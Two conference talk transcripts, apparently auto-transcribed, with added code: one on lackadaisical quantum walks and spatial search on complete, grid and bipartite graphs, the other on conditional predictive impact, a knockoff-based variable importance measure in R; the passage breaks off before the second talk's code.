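Before moving on to the shift, here is a quick check (mine, not the speaker's code) that the coin C = 2|w><w| - I, with |w> proportional to (1, 1, sqrt(l)), acts on the amplitudes (a, b, c) exactly as described above; the particular numbers are arbitrary.

```python
import numpy as np

l = 2.5
w = np.array([1.0, 1.0, np.sqrt(l)]) / np.sqrt(2 + l)   # weighted coin state
C = 2 * np.outer(w, w) - np.eye(3)                      # generalized Grover coin

a, b, c = 0.3, -0.7, 0.55
psi = np.array([a, b, c])

mu_bar = (a + b + np.sqrt(l) * c) / (2 + l)
expected = np.array([2 * mu_bar - a,
                     2 * mu_bar - b,
                     2 * np.sqrt(l) * mu_bar - c])

print(np.allclose(C @ psi, expected))    # True: matches the described action
print(np.allclose(C @ C, np.eye(3)))     # True: the coin is its own inverse (unitary)
```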
So this is the quantum, this is the coin quantum walk equivalent of Zegadie's quantum walk. The flip-flop shift I haven't talked about yet, so just to quickly go over that as many of you know. If you're at this vertex and pointing right, so you're here, you're pointing right, what you do is you hop and then you turn around. So you end up here pointing backwards. So you, you, and then you flip. So it's a flip-flop shift because you flip your direction. So that's it. So using that previous coin on a weighted graph and this shift, you get something that's exactly the same as Zegadie's quantum walk or quantum Markov chain. All right. So with all that, let's see how it acts on the 1D line. So here's the classical result. Here's the normal coin quantum walk and the lackadaisical quantum walk is this. And so what you see is that, okay, yeah, there is some probability of staying very close to where you started. But there's also a significant probability of being far from when you started that's actually even further than a normal quantum walk. So in some sense, a lackadaisical quantum walk, even though it's lazy, can actually spread faster-ish because of this middle peak. And so you might start to wonder, well, are there any algorithmic improvements that you can make with this property? The standard deviation of this is still linear in time, but it's a bigger factor in front. And so we're going to look at some search problems with that. Pause the moment so people can finish writing. You're telling me you're a standard grads. All right, so let's go ahead and do that. Let's apply this to some algorithmic problems, to some search problems, and see if we can get any improvements. So let's start by talking about what this search problem is. It's called spatial search. So imagine you're looking for a cafe. So this is Riga Latvia, where I did my first postdoc, and that's the University of Latvia. And so imagine you're new to Latvia, and you're looking for a cafe, and you're starting in front of the university, and you're like, I don't know where a cafe is, but this is Europe. If I just wander around, I'm sure I'll find a cafe. So what you can do is you can do a random walk. So from here, you have three options. You can go up to the left, you can go up to the right, or you can go down to the right, and you just randomly pick one. So let's say you go up to the right. So up to the left, never mind, very random. And now here, again, you're like, well, which way should I go? There's no cafe. Here you can go up to the left, up to the right, or you could actually go back the way you came, maybe that way you don't like. So you randomly pick one, and you end up over there. Again, you have three choices. You go over there. You have more choices now, which way to go, and say you randomly pick that one, and then, oh, there's a cafe there. So the idea is you randomly walk. Go, is your cafe? No, randomly walk. Is your cafe? No, randomly walk. Is your cafe? No, randomly walk. Is your cafe? Yes, you found your item. So this is the spatial search problem. Quantumly, you can do a very similar thing, except with a quantum walk. So if you start there, now you can walk in superposition. So you flip your quantum coin, a three-sided coin, and then you walk in superposition, and now you can end up in all three of those locations. You do the same thing. At all those locations, you flip your coin and walk, and you end up in something like that. 
And now you see that there's actually some probability at that cafe that's in the corner. There's actually another cafe over here, but whatever. There's actually cafes everywhere. It's Europe. Okay. But this is the idea of spatial search. So let's get to the particulars of it and how fast these algorithms can be, starting with the complete graph. So this corresponds to Grover's algorithm. So here's an example of a complete graph with six vertices. In general, we'll have n vertices. And it's a lackadaisical quantum walk. We have a self-loop of L everywhere. And let's just say that's the marked vertex indicated by a double circle. But the idea is that you don't know that, you're trying to find it. So there's something to explore in a couple of papers. And the complete graph corresponds to Grover's problem. It's this unstructured or this unordered database that Grover's algorithm solves. Because the idea is there's no order here. If you read this vertex, you can jump to any other vertex. There's no constraints as to how you can move. All right. So there it is again. So let's talk specifically about this algorithm, since this is a quantum walk conference. You guys can see more of what's going on under the hood. So for the initial state, all of the amplitudes along these internal edges are the same. So the amplitude of here pointing to there is the same as the amplitude here pointing to there. And the same as the amplitude here pointing to there. And all of these internal edges, you start with the same amplitude everywhere. And then for the self-loops, it's that amplitude, except you multiply it by the score root of L. Because it has some nice properties and stuff. A couple of nice properties. One of them is that this is a uniform superposition over the vertices. So every vertex has the same total probability. Because all of these internal edges are the same. And then they all have the same, all of these self-loops have the same amplitude as well. So basically every vertex has the same total amount of amplitude, same total amount of probability. So this is a uniform superposition over all the vertices. If you were to measure this initial state, you'd get each vertex with probability 1-6 in this case. Another property of this is that this is a one eigenvector of the quantum walk of the coin in the shift. So if you applied only the quantum walk to this initial state, nothing happens. If you want to search, you need to do more than just apply the quantum walk. You need to query the oracle as well. You have to ask, am I at a cafe? So the search algorithm applies the following. You have an oracle query, and then you do the quantum walk, which is just the Grover coin and the flip-flop shift. So this constitutes one step, and you're going to repeatedly step through this. So the Grover coin we talked about, the flip-flop shift we talked about, now let's talk about what the oracle query is. Any questions? OK, so the oracle query here is really simple. All it does is it flips the amplitude at marked vertices. So just give you an example. Let's say we have an unmarked vertex here, and it has amplitude A of pointing up, B pointing to the right, C pointing down, and D pointing to the left. So if you apply the oracle to this, nothing happens because this is unmarked. So you skip the exact same thing when you query the oracle. If it's marked on the other hand, shown by this double circle, then each of these amplitudes, A, B, C, D, become flipped. So you get minus A, minus B, minus C, and minus D. 
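Putting the pieces described so far together (the weighted initial state, the phase-flip oracle, the generalized Grover coin, and the flip-flop shift), here is a compact simulation sketch of the lackadaisical search on the complete graph. This is my own illustration, not the speaker's code, and the state layout, an N x N array of arc amplitudes with the self-loop stored on the diagonal, is an implementation choice.

```python
import numpy as np

def search_complete_graph(N, l, steps, marked=0):
    # Coin state at each vertex: weight 1 on each of the N-1 edges, l on the loop.
    s = np.full((N, N), 1.0)
    np.fill_diagonal(s, np.sqrt(l))
    s /= np.sqrt(N - 1 + l)                  # each row is a unit coin state

    psi = s / np.sqrt(N)                     # uniform superposition over vertices
    probs = []
    for _ in range(steps):
        psi[marked, :] *= -1                 # oracle: phase flip at the marked vertex
        proj = (s * psi).sum(axis=1)         # <s_v | psi_v> at every vertex v
        psi = 2 * proj[:, None] * s - psi    # Grover coin: 2|s_v><s_v| - I
        psi = psi.T.copy()                   # flip-flop shift: arc (v, w) -> (w, v)
        probs.append(np.sum(np.abs(psi[marked, :]) ** 2))
    return probs

N = 1024
for l in [0.0, 1.0]:
    probs = search_complete_graph(N, l, steps=int(2.5 * np.sqrt(N)))
    print(f"l = {l}: peak success probability ~ {max(probs):.3f}")
# Without the self-loop the peak should sit near 1/2, and with l = 1 it should
# climb toward 1, which is the behaviour described in the talk.
```

A small design note: for the complete graph the flip-flop shift is just a transpose of the arc array, which keeps every step fully vectorized.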
So this is the phase flip oracle that you use in Grover's algorithm for whatever problem you're solving. So it's the same idea here. So that's it. So all you do is you apply this phase flip oracle, so the marked vertices get their amplitudes flipped, and then the Grover coin, and then the flip-flop shift, and you just keep doing that over and over. That's it for the search algorithm. So let's see how this searches the complete graph, let's say, with 1024 vertices. So let's start with no self-loops. So with no self-loops, or when L is zero, what happens is the success probability starts at 1 over 1024, which is pretty small. And as you keep applying this query coin shift over and over and over, the success probability builds up. So more and more probability builds up at your marked vertex until it reaches a peak of a half, and then it's going to go down and then keep going up and down like that. And so this time at which you reach your max success probability, this is order square root of n, which is Grover's order root n runtime. Since the success probability is a half, on average you'll have to run the algorithm twice before you find the marked vertex, but if you double your runtime, it's still order square root of n, so you're fine. So this is the quantum walk version of Grover's algorithm without lackadaisical, anything like that, just normal coin quantum walk version. If you make it a lackadaisical quantum walk, let's see what happens. So instead of L being zero, let's increase L a little bit to 0.1. And you see that the success probability that you reach, instead of reaching half, you reach a little bit higher value. If L is 0.2, you reach a higher value still. If L is 0.4, it's even higher. If L is 0.8, it's almost that one. Let's keep going, let's clear the graph, so we keep going. If L is one, you do reach a success probability of one. If L is greater still, two and a half, oh now it's actually worse. If it gets more lazy, it's worse again. If you get more lazy, it's still worse. And so what we see is that the best amount of laziness is actually, if you increase more, is actually when L equals one. So for this algorithm, there's some optimal amount of laziness, which could be a life lesson. And so we do get algorithmic improvements by using a lackadaisical quantum walk. And you can actually, so yeah, you can search more quickly with a lackadaisical quantum walk. So you can actually prove all this analytically. So that's in the paper. Basically, depending on what value L is, you can find what the runtime and the success probability is. You don't need to parse through all that. The idea though is that this is solved. And basically any question you want to ask, you can get from these results. So for example, the success probability originally was a half, and then it went up, and then it went back down. And at some point, it became less than a half again. So there's some range of L's where you'll do better than a half. You can use these formulas to figure that out. And what you can find is that when L is less than roughly 5.8, the success probability is better than a half. So you can ask whatever question you want like that. Any questions so far? All right, so let's jump to the two-dimensional grid or the torus. And again, say there's n vertices. And this is a torus, so the boundary conditions wrap around. So let's see what happens here. So again, we'll just look at some simulations. So the normal coin quantum walk, no self-loops, not lazy, looks like this. So here n is 256. 
So the success probability starts at 1 over 256, and it builds up a little bit, and then goes back down and so forth. So if we make it lazy, let's say L is 0.005. And now the success probability actually jumps up quite a bit. It's more lazy. It jumps up some more. Make it more lazy. And oh, it's bad again. So again, we see the same trend where there's some optimal amount of laziness so that your success probability is boosted as much as possible. And so with this one, if it's bigger still, it's still worse. So this optimal amount of laziness is green curve that's 0.015. This actually corresponds to when L is 4 over n. And so for example, if we let L be 4 over n, we can pick different values of n, different size grids. So when n is 256, which is the plot we just had, you get this. When n is 1024, you get this. If n is 4096, you get this. And you basically see that the success probability is constant and it's near 1, which is nice. And so in terms of runtimes, well, a normal quantum walk that's not lazy, it's the time to reach that first peak in success probability, scales as the square root of n log n, and the success probability, so the value of that peak, scales as 1 over log n. And so if you use amplitude amplification, the total runtime is root n times log n. So it's almost square root of n. You have a log factor. With the lazy or lackadaisical quantum walk, when L is 4 over n, what we get is that the runtime has the same scaling, but now your success probability is constant. So you don't have to use amplitude amplification to repeat the algorithm. And so then the total runtime is just root n log n with the log inside the square root as opposed to outside the square root. And so what we see is we actually do get an improvement in the runtime scaling, not just the constant factor. So with the lackadaisical quantum walk, you get an order log n, an order square root of log n speed up. This is all done numerically. I wasn't able to prove this. So this is an open question if you want to work on a proof. Any questions? Yeah, question? OK. All right. So in terms of the graphs that have been explored with the lackadaisical quantum walk, we have the complete graph that I talked about. We have a 2D grid or a torus, as it's talked about, with one marked vertex. Some people have explored different configurations of multiple marked vertices as well. People have also looked at the 1D cycle and this network that has some hierarchy to it. And with my student, again, we looked at the hypercube and some other things. And in all of these graphs, all the self-loops had the same weight. So you had the same amount of laziness everywhere. And the reason for that is because all of these graphs are vertex transitive, meaning every vertex has the same structure. And so there's no structural reason for one vertex to be more lazy than some other vertex. So you have all the weights be the same. That's very reasonable physically. So we were wondering, well, is there a case where you might naturally have different amounts of laziness at different vertices? And I think a very natural example of that is the complete bipartite graph. And this is what my student Mason, Rhodes, and I explored this year. So again, a bipartite graph looks like that. A complete bipartite graph means you have all the edges between them. OK, thank you. OK, good, I have more time. So I'll say there's n1 vertices on the left, n2 vertices on the right. So again, we have two part types sets, n1 and n2 vertices. 
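Before going on with the bipartite case, here is the torus comparison from a moment ago written compactly (as reported above; the constant peak probability and the resulting square-root-of-log speedup are numerical observations, not proven):

```latex
% 2D torus with n vertices, one marked vertex; t* = time of first peak, p* = peak success probability.
\[ \text{plain coined walk:}\quad t_* = \Theta\!\big(\sqrt{n \log n}\big),\;\; p_* = \Theta\!\big(1/\log n\big)
   \;\;\Rightarrow\;\; \text{total } O\!\big(\sqrt{n}\,\log n\big) \text{ with amplitude amplification} \]
\[ \text{lackadaisical walk, } l = 4/n:\quad t_* = \Theta\!\big(\sqrt{n \log n}\big),\;\; p_* = \Theta(1)
   \;\;\Rightarrow\;\; \text{total } O\!\big(\sqrt{n \log n}\big) \]
```

Now, back to the complete bipartite graph with its two sets of n1 and n2 vertices.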
And every vertex in one set is adjacent to all the vertices in the other because it's complete. And in general, this is not regular. So in general, you can have a different number of vertices in one set versus the other set. And because of that, structurally, these vertices on the left have a different structure from the vertices on the right. And so now it becomes natural to have one amount of laziness for these vertices and some other amount of laziness for these vertices. And so let's call these self-loops weight l1 and these self-loops weight l2. So we have now a lackadaisical quantum walk with different amounts of laziness. All right, so what we'll look at next is we'll look at this case that's not lazy first, and then we'll look at the lazy or lackadaisical case. All right, so let's start with the normal coin quantum walk, not lazy at all. So as a first step, the easiest case would be if you have all your marked vertices in one set. And then later, we'll have marked vertices in both sets. So let's say you have k marked vertices, and they're all in this first set that has size n1. And the initial state here is going to be the following. So all of these edges have the same initial amplitude. So one consequence of this is now this is not a uniform superposition over the vertices. And that's because these vertices have a lot more edges than these vertices here. So these vertices are going to start with a greater initial amplitude. So not all the vertices have the same initial probability now. These actually have a greater probability. If you're curious how the initial state evolves, if you are in a uniform superposition over all the vertices, you can check our paper. But this case that I'm going over here, this is cleaner. So that's what I'll talk about. So here's some simulations of that. So with different values. So say you have three marked vertices in the left set, which has 400 vertices total. And say the right set also has 400 vertices. So what happens is the success probability goes up, reaches a half at this time, and then it goes back down and it's periodic again. Let's say we change the number of vertices in the second set. So instead of 400, let's say it has 200. What you see is we get the exact same evolution. The success probability reaches a half at the same time. And again, if you change the number of vertices in the right set to even just one, you can see these little green dots and it follows the same curve. So what we see is that the number of vertices in the second set doesn't matter. All the marked vertices are in the first set, on the left set. And that does matter. So if we change the number of vertices in the first set, we reach a probability of a half at an earlier runtime, because there's a few vertices in the left set. If we change it even more, if all the vertices in the left set are marked, we're actually just always at a success probability of a half. And so, yeah, so that's what happens. We were able to prove this analytically so that the success probability reaches a half, as you saw in the previous graphs. And the time at which you reach that probability only has N1 and K in it. There's no N2. Again, the number of vertices in the second set doesn't matter. And so again, the only thing that matters in the runtime is the ratio of N1 and K. It's only the first set's properties. Any questions? All right, so now if we have marked vertices in both sets, so say K1 in the left set and K2 in the right set, let's see what happens. So here's some values. 
So if there's three marked vertices in the left, two marked vertices in the right, and that number in both sets. And one of the things that you'll notice here is that the ratio or the density of marked vertices in each set is the same. I guess you could phrase it like that. And what you find is that, well, let me plot this. So I'm going to plot this as the success probability in the left set separately and then the success probability in the right set so you can see what happens in each set. So the success probability in the left set evolves like this. Again, it reaches a half. The success probability in the right set that has two marked vertices and 400 total vertices evolves like that the same way. And so the total success probability would just be the sum of these two curves, which then of course reaches one. And so what we see here is that because the densities are the same, they end up peaking at the same time and so then you get a total success probability of one. The densities are different. So here I've changed the value. So now the densities are not the same. So I've swapped these two sizes. The first set is going to peak there. The second set on the right is going to peak there at a different time. And so now, of course, if you add them, you won't reach a success probability of one. You'll get something a little bit less. And so we're able to analytically prove this. The runtime in each set, so in the left set, you get a probability of a half. At this time, that only depends on the properties of the left set, the density. And the right set also reaches a success probability of a half. And the time only depends on its density of marked vertices. And so if these two line up, then they add up together, they get a success probability of one. So that's kind of neat. So again, the only thing that matters is what goes on in each set. Otherwise, they evolve independently of each other. Any questions before we get to the lackadaisical versions? All right. OK, so let's make this lackadaisical now. And we'll go back to the first case. That's easier, where you only have K marked vertices in one set. And now you have self-loops with weight L1 here, and self-loops with weight L2 here. So again, they can be different amounts of laziness. Or they could be the same. You can pick the same value on both sides. Doesn't matter. The point is you can now adjust this. All right, so let's see what happens. So just to remind you, with the normal coin quantum walk, it evolves like this. If you make it lackadaisical, let's change L1. So let's say L1 is 0.3. We see that we get a boost in the success probability, which is nice. If we change the L1 some more to 0.6, it gets better still. Make it more lazy, we get that. Make it more lazy, we get that, which reaches 1, which is nice. If you make it more lazy, it goes down. More lazy, it goes down, and down, and down, and so forth. So same story. There's some optimal amount of laziness. And in this case, it's when L1 is 1.2 with these values here. OK, so let's go ahead and, oh, it's more lazy. OK, so it's the best when L1 is 1.2. So let's fix L1 as being 1.2. And now let's see what happens as we vary L2. So this is what we just had before. Now if we change L2 to make that lazy as well, oh, nothing happened. Make L2 even bigger, nothing happens. Make it even bigger, oh, nothing happens. So with marked vertices in the left set, it seems like it doesn't matter how lazy the right set is. It only matters how lazy the left set is. 
And so we see that L2 doesn't matter here. And so here's another way of visualizing that. So what we did is we varied L1 and we varied L2. And we plotted in color as a heat map the maximum success probability. So you see that the success probability is 1, as long as L1 is 1.2. And then it doesn't matter what L2 is. It's the same thing. So from this, you can see that L2 doesn't matter. Only the left set, where the marked vertices are, matter. And we were able to analytically prove this. So you want L1 to be that, which is 1.2, with the numbers we just had. And then the success probability reaches 1, and the runtime doesn't have N2 in it. It only has what's going on in the left set. Any questions? All right. So now, marked vertices in both sets, k1 in the left, k2 in the right. So with these values, let's just pick different values of laziness. So with no laziness, this is what you would get. It looks a little crazy now, because it's marked vertices in both sets. So they might not add up nicely. If you make it lazy now with, say, L1 is 15, L2 is 5, you do get some improvement here. With these values, L1 is 15, and L2 is 100. It's pretty similar to that. If L1 is 80, and L2 is also 80, you get something that's not very good. And if you look at these, it's kind of hard to compare these. Because even this black curve, I mean, it reaches 1 over here. Like, should we use that peak, or should we use this peak? It's like, how do you compare these? And so a good quantity to look at is the total runtime with classical repetitions, which is basically the idea that if your success probability is, say, 1 half, you have to run the algorithm twice on average before you find your marked vertices. And so the total runtime then is the single runtime divided by your success probability of a single run. And so we can plot that as a heat map here. So this is now the total success probability, which is the total runtime. Sorry, the total runtime, which is the single runtime divided by the success probability. And what you see is that it's not so nice anymore, depending on how lazy each side is. And so the color here is, I picked the middle to correspond to the normal coin quantum walk. So anything that's more yellow, which is less time, which is faster, is better. So we see that if the laziness values are within here, that it's better, but if it's over here, it's worse, and so forth. And in particular, the values that we just saw here, these correspond to these points. So this is the normal coin quantum walk. The red and the green ones where we got an improvement are in this yellow band. And in this blue curve over here, where it's worse is in this dark blue area, which we expect to be worse. And so this is this simulation of what happens. We weren't able to prove this. It's a mess. So that's an open question. If you want to take us, if you want to try that. Here's another example. So here I've actually swapped the number of mark vertices in each set. So before, it's 5 and 2. Now it's 2 and 5. So if we look at that, oh. So again, the middle is the normal quantum walk. And so there's kind of nothing that's better. So at least with these particular values, it seems like there's no improvement with the self-loops, which I thought was kind of surprising. Because if you can pick the weights of the self-loops on each side, it seems like there's got to be some values you can pick to make things better. Because all the previous papers showed that you could do better. 
And here we're actually showing that for these values, you can't do any better. And here's another set of values where there's the same number of marked vertices in each set, but the sets are different sizes. It looks like this. So you get a little bit of improvement here. But for most values of laziness, you don't get any improvement. And so there's some limited improvement here. And again, this is open for proof, if you want to try proving that. So it's an open question. So just to summarize what we've talked about, we saw that lackadaisical quantum walks spread faster in one dimension-ish, because there is still that central peak. But the two peaks on the side spread faster than a normal coin quantum walk. We see that they improved search for a bunch of problems that were vertex transitive, like the complete graph, the grid, and so forth. And when we apply it to the complete bipartite graph, we do still get an improvement for sure if the marked vertices are only in one set. But if the marked vertices are in both sets, then you might get improvement, or you might not. And exploring that would be some great future work if anyone's interested. And so if you want to see the papers, you can just go to my website, it has all my papers, or you can ask me or email me or something like that, and I'd be happy to take your questions. Thanks for your attention. Do you have questions for me? All right, thanks for the nice talk. It's an interesting result that you found. You mentioned in one of your slides that you were just looking at something similar, like lackadaisical quantum walks on the hypercube. And around 10 years ago, we did something similar. We extended the SKW search with the self-loops. Are you aware of those? I'm not aware of that work. And if you could email that to me, I'd be really interested. Yeah, OK. Yeah. We should continue on this. Yeah. Although one thing that sounds different is, did we use the same oracle? Because if you use the SKW one, that one uses a different oracle. So we'd have to see how that compares. Yeah, definitely we can talk. Just in your initial model, with one dimension. So the analog of, say, the Hadamard matrix is, you're talking about the Grover matrix, three by three. Well, I guess the analog of the Hadamard matrix would be a Fourier matrix. But I was looking at the Grover coin because I'm specifically interested in search problems. OK. So those parameters you have, L and A and B, feed into this Fourier matrix? Is for what, sorry? Those parameters, A, B, and the amplitudes, they're part of the Fourier matrix that you're choosing. No, I was just showing how the Grover coin would act if the amplitudes were A, B, and C. OK. Yeah. Just to show that what it does is that it flips around the average if it's unweighted, and if it's weighted, it does that funny thing. Please. Regarding the 2D lattice, you said that you don't use amplitude amplification. So how can you, and you did that numerically, so how can you know numerically that you don't have a square root of log? Yeah. And there is an N multiplying the log. So the log is hidden by the N. How can you distinguish square root of N log N from square root of N times log N, with the log outside the square root? I understand. Square root of N log N. Yeah. So if we're fitting a curve, a square root of log factor is very hard to see. And so in that paper, I give plots and try to justify that the fit is correct. I didn't show any of that here. So if you want, we can look over it more closely offline. Yeah.
I have another question regarding the truncated simplex lattice. You have an algorithm that searches on that lattice, and it seems that it is not square root of N. It is larger than square root of N. Yeah. That was search with a continuous-time quantum walk. Exactly. So it's not square root of N? No. Is it the first-order truncated lattice? So it wasn't square root of N if you have an unweighted graph with a continuous-time quantum walk? Is it possible to find a square root of N algorithm in this case? So I was able to get it down to close to square root of N by weighting the edges that connected the cliques. So you have these cliques, right? And then if you weight the edges that join those cliques, those long distance edges, you are able to improve it. And as the weight increases, the runtime tends towards the square root of N. So I wasn't able to exactly reach square root of N, but it tends towards it. OK. Yeah. OK. As the weight increases, then it asymptotically approaches square root of N. And I'll give a quick comment. Historical. So you mentioned Childs's paper about lazy quantum walks, but there is one before, I think it's 2005. OK. By Inui, Konno, and Segawa. I think it's the first one on lazy quantum walks. OK. Is that the same as the three-state quantum walk? Three state. Yeah. So I didn't talk about the history, the order in which I did this. So I actually didn't look at the 1D line first. I actually looked at search on the complete graph first, and then wrote the paper, submitted it, and then I'm very thankful that the referee responded saying, oh, this seems very similar to three-state quantum walks, which I had never heard of at that time. And so yeah. So basically, I agree that the 1D walk is very similar, but just the way it was developed is kind of from a different perspective that then ends up having a lot of similarities. Thanks for the talk. Could you talk about how robust your search algorithm is to noise? What kind of noise? Any sort of positional noise, coin noise, anything in that regard? Are you talking about decoherence? Or are you talking about if you just use a different? I would say more decoherence. OK. Any sort of spatial or temporal decoherence? There's been some work on it that I have not done. So I know that maybe experts in this room can comment on that, but that's not something that I know very well. Another question? How familiar are you with the theoretical bounds for oracle searches? And is this, I don't know, does that apply to your scenario? Yeah, it does. So it's still true that the fastest you can search is order square root of n, because the optimality of Grover's would still apply, because that has to do with which oracle you use. So we're using the same type of oracle that's in Grover's problem. So you can still only search in order square root of n. Depending on the graph you search on, you may not be able to reach that. So for example, if you search on the one-dimensional line, you actually can't search faster than order n, than linear in n, which means you can't do any better than just randomly guessing for the marked vertex. Thanks. So thanks, speaker. Thank you. Thank you.
|
The coined quantum walk is a discretization of the Dirac equation of relativistic quantum mechanics, and it is a useful model for developing quantum algorithms. For example, many quantum spatial search algorithms are based on coined quantum walks. In this talk, we explore a lazy version of the coined quantum walk, called a lackadaisical quantum walk, which uses a weighted self-loop at each vertex so that the walker has some amplitude of staying put. We show that lackadaisical quantum walks can solve the spatial search problem more quickly than a regular, coined quantum walk for a variety of graphs, suggesting that it is a useful tool for improving quantum algorithms.
|
10.5446/54137 (DOI)
|
I'll give you an example in R. So if you think about machine learning, you probably think like image classification or natural language processing or speech recognition coming to your mind. So for example, you might see here the CT image and your machine learning detects a tumor right here in this CT image. But all of these applications are about prediction. But in epidemiology, that's also the definition of the WHO is that we're interested in the determinants of diseases. So that is interpretation. So we don't want to predict something, some disease states, we also want to do that. But that's, I would say, more rarely. But usually we're interested in understanding diseases. And that's what we want to do here. So to develop model agnostic interpretable machine learning. So model agnostic means you can choose your machine learning method and your interpretation methods method works anyway. So the interpretation method doesn't dictate the machine learning method you want to use. And more specifically, we want to talk about conditional variable importance. So consider this very typical example, you have an exposure x, an outcome y and a confounder z. And now the confounder has an effect on x and y, but there's no effect from your exposure to the outcome. And if you apply your standard linear model to that, you will see effects like that. So if you scale that, you would see that x has a zero effect on y and z has a large effect on y. And that I would say is correct if you look at this deck right here. But if you apply a typical machine learning method, so for example, you apply random forest and calculate the permutation variable importance, you'll get also an effect of x. And that's because x is correlated to y. So the method cannot handle cannot adjust for the confounding by the confounder z. The reason is that the linear model is a conditional method, but the random forest or in general, most machine learning interpretability methods are marginal measures. So we want to fill maybe this gap here on the right. So we want to do machine learning, but do a conditional testing. And if you, from a statistical perspective, the marginal test tests whether your variable of interest, call it xj, is independent of y. So is there a dependency between the two? And the conditional hypothesis we're interested in is xj independent of y, given all other x's. So all other variables you have in the data set that might be confounders. And as I just said, we want to do conditional testing with machine learning. Just you might have heard of the permutation importance. That's the one we just used in the random forest. I briefly explained the algorithm. So what you do is you fit your model to your data, you determine some kind of loss function. So how well does the model predict unseen data? And now you replace a variable of interest by a permuted version of that variable, and determine the loss afterwards. So how much does the prediction get worse if you permute your variable of interest? So if it gets worse, the variable was important. If it doesn't get worse, the variable wasn't important. And that's why your permutation importance is a difference between the two losses. So your estimated variable importance of the variable j is this difference. And that's the marginal measure as I've shown in the box plot on the second slide, because the permutation results in xj star. 
So the permuted version of xj is independent of y, but also independent of all others, because it's just permuted; it makes it independent of all other variables in your data. And what we do in our method is only a slight modification. Instead of the permutation, here the difference is highlighted in red, we replace the variable by its knockoff version. So I'll explain a little bit more on that. And then steps four and five remain the same. So we determine the loss afterwards and look at the difference. Now we call this the conditional predictive impact instead of the permutation variable importance. And the difference is that with these knockoffs, your knockoff variable is independent of y, but preserves all correlations to the other x's. So for example, the correlations to a confounder remain there. And that's why it's a conditional measure. For the knockoffs, I won't go into the details, but the idea is to have a knockoff matrix x tilde, where you have equal correlations between your original variables and the variables in the knockoff matrix. So the correlation between two variables in the original data set is the same as between the two knockoff variables, and also the same if you take one from the original and one from the knockoff matrix. But your x tilde is independent of y given x. So that was originally proposed for negative controls to control the false discovery rate. But that original method, this is the Candès 2018 paper, requires an existing variable importance measure. And that's the part where the model agnostic comes into play, because this is not model agnostic, because you need that existing method. And they often use the one from the Lasso, but it also works for example with the random forest, you could also plug in other methods, but you need a model-specific variable importance measure; for our method, you don't need that. Many, many knockoff samplers have been proposed very recently. So there are multivariate Gaussian ones or second-order multivariate Gaussian ones, hidden Markov models, you can also use deep learning approaches for that, and so on. We now focus on the second-order multivariate Gaussian knockoff sampler, but it actually doesn't matter so much which one you use; it works just as well with all of them. We'll see that a bit later. We can also do statistical inference. So you can show that our CPI estimate is asymptotically normally distributed. So we can just use the instance-wise loss for statistical inference. We change the algorithm just a little bit so that we look at the instance-wise loss, so for example, instead of the mean squared error, we just look at the squared error. And then we can use that for statistical testing, and just do a t-test or also a Fisher exact randomization test for small samples, which actually also works for large samples. So that's a big plus, that you can get statistical testing, you get standard error estimates, you get confidence intervals, which you don't get with most of the machine learning interpretability methods. So the result is here on the right, we see now on our toy example that we do see no effect of the exposure on the outcome, but we do see an effect of the confounder on the outcome. And that's actually what you see in the graph. So we have a conditional measure based on machine learning. I also want to show some simulation results. If you're interested in the details of the simulation study, I have the slides prepared, just want to save some time.
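Before the simulation results, here is a minimal R sketch of the CPI computation just described. This is illustrative code, not the cpi package itself: it assumes the ranger and knockoff packages, uses a single train/test split instead of cross-validation, and uses the squared error as the instance-wise loss.

```r
library(ranger)    # random forest
library(knockoff)  # second-order Gaussian knockoffs (Candès et al.)

# CPI for one variable j: compare the instance-wise loss before and after
# replacing column j by its knockoff (not permuted) version.
cpi_single <- function(X, y, j, train_idx) {
  fit <- ranger(y = y[train_idx], x = X[train_idx, , drop = FALSE], num.trees = 500)

  X_test <- X[-train_idx, , drop = FALSE]
  y_test <- y[-train_idx]

  loss_orig <- (y_test - predict(fit, data = X_test)$predictions)^2

  # Knockoff copy of the test covariates: preserves the correlations among
  # the x's, but is independent of y given X.
  X_ko <- knockoff::create.second_order(as.matrix(X_test))
  X_repl <- X_test
  X_repl[, j] <- X_ko[, j]

  loss_ko <- (y_test - predict(fit, data = X_repl)$predictions)^2

  # CPI estimate and a one-sided paired t-test on the instance-wise differences
  delta <- loss_ko - loss_orig
  list(cpi = mean(delta), test = t.test(delta, alternative = "greater"))
}
```

The only difference from the permutation importance loop is the replacement step: a knockoff column keeps the correlations with the other covariates, which is what makes the resulting measure conditional rather than marginal.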
So these are the box plots of calculated CPI values with different machine learning methods, could argue that maybe the first one is not a machine learning method, and once on linear and on nonlinear data. And you see that and the effect size here on the horizontal axis, and you see that the CPI values increase with the effect size, that's what you would expect for it to work, but also that it's at zero for no effect, for example, the only case where it's not working is for nonlinear data on with the linear model, which makes sense. As a linear model has no power to detect anything on nonlinear data. That's why you might use machine learning in the end. You can also look at the type one and type two error. So here the zero effect size, that's the type one error. And you see that for all four methods, this is at 0.05 as expected, and the power increases over time. So by that you can see that it works again with all of these different machine learning methods. And I want to show you a brief example on how to use that. And I'll show you some R code for that. So to use, there's the CPI package. I forgot to put the GitHub link here, I just noted. So you would have to install it from GitHub at the moment because it's not on Cran yet. And you load the CPI package, the MLR package, and we also use ggplot for plotting. And we want to use the Boston Housing Data. The data is already included in the MLR package, but there is a two level factor and we have to convert that to binary. So that's the first step we have to do as a preparation. And then we can just apply CPI on the task we just defined. And we say here we want to use Ranger, so a random forest. We could add here, for example, we want to have 500 trees and try a value of whatever value you want to choose. And we said that we estimate loss and we need some kind of resampling for that. And here we use a 10-fold cross-validation. So it will then do internally a 10-fold cross-validation and estimate the loss by that cross-validation. And then you almost immediately get the result. And that's here, for example, for the variable RM, I think that's number of rooms. You get quite a high CPI estimate, very small p-value. And you also get the lower part of the confidence interval, which is also far away from zero. And you also get some others. For example, here this one, you don't know what the variable represents. The CPI value is close to zero, p-value is quite big, and also the lower end of the confidence interval is below zero. So that's then the result you get. We can do the same maybe again for a support vector machine. So now instead of Ranger, we use here the SVM with the radial kernel. And instead of just to show you that you can choose other methods here, instead of the 10-fold cross-validation, we use a five times repeated sub-sampling. So this is all. If you have used the MLR package before, you will know these re-sampling and make learner things that's specific to MLR. And we save the results from that call and plot it with ggplot. Then the result looks like this. So we see that again, this number of rooms get a high estimate. And now we plotted a bar plot and added some standard errors. And you see, for example, that you have some very small values. And by the standard error, you can also get some idea of the variability in that. Because it often happens that these things are a little bit unstable and bar plots of random forest variable importance might look completely different if you run it again. 
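For readers who want to try this themselves, here is a hedged reconstruction of the two calls walked through above. The structure follows the verbal description and the usual mlr conventions (makeLearner, makeResampleDesc, the built-in bh.task); the exact argument names of cpi() and the column names of its result are assumptions and may differ in the actual cpi package.

```r
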